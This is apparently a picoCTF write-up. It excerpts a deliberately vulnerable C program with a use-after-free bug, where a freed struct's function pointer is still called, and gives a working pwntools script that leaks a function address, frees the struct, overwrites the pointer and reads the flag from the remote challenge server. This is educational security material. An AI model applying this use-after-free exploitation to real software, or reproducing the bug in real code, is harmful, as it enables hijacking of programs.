typedef struct { uintptr_t (*whatToDo)(); char *username; } cmd;
user = (cmd *)malloc(sizeof(user));
void i(){ char response; puts("You're leaving already(Y/N)?"); scanf(" %c", &response); if(toupper(response)=='Y'){ puts("Bye!"); free(user);// <-- Here }else{ puts("Ok. Get premium membership please!"); }
void doProcess(cmd* obj) { (*obj->whatToDo)(); //<-- call user's function }
int main(){ setbuf(stdout, NULL); user = (cmd *)malloc(sizeof(user)); while(1){ printMenu(); processInput(); //if(user){ doProcess(user);// <-- Here //} } return 0; }
void hahaexploitgobrrr(){ char buf[FLAG_BUFFER]; FILE *f = fopen("flag.txt","r"); fgets(buf,FLAG_BUFFER,f); fprintf(stdout,"%s\n",buf); fflush(stdout); }
void s(){ printf("OOP! Memory leak...%p\n",hahaexploitgobrrr); puts("Thanks for subsribing! I really recommend becoming a premium member!"); }
void leaveMessage(){ puts("I only read premium member messages but you can "); puts("try anyways:"); char* msg = (char*)malloc(8); read(0, msg, 8); }
#!/usr/bin/env python3 #-- all rights: @fey --# #-- py-version: 3.* --# from pwn import * import struct as st #SET UP proc = process(["nc", "mercury.picoctf.net", "50361"]) #Leak vuln addr print("[+] Leaking vuln function's address") resp = proc.recvuntil("xit") proc.sendline("s") resp = proc.recvuntil("xit") leak_addr = resp.split(b"\n")[1].split(b"...")[1] int_leak_addr = int(leak_addr,16) print("[*] Vuln function addr:", leak_addr, "->", int_leak_addr, "-->", hex(int_leak_addr)) #Delete User print("[+] Deleting user struct") proc.sendline("i") proc.recvuntil("?") proc.sendline("Y") resp = proc.recvuntil("xit") print("[*] User is now free") #Update User's function value print("[+] Updating value for user function, with vuln function") proc.sendline("l") resp = proc.recvuntil(":\n") proc.sendline(st.pack("I", int_leak_addr)) print("[*] Value updated") #GET FLAG print("[+] Get flag") resp = proc.recv().split(b"\n")[0] resp = str(resp)[2:-1] print("[!] Here is the flag:", resp)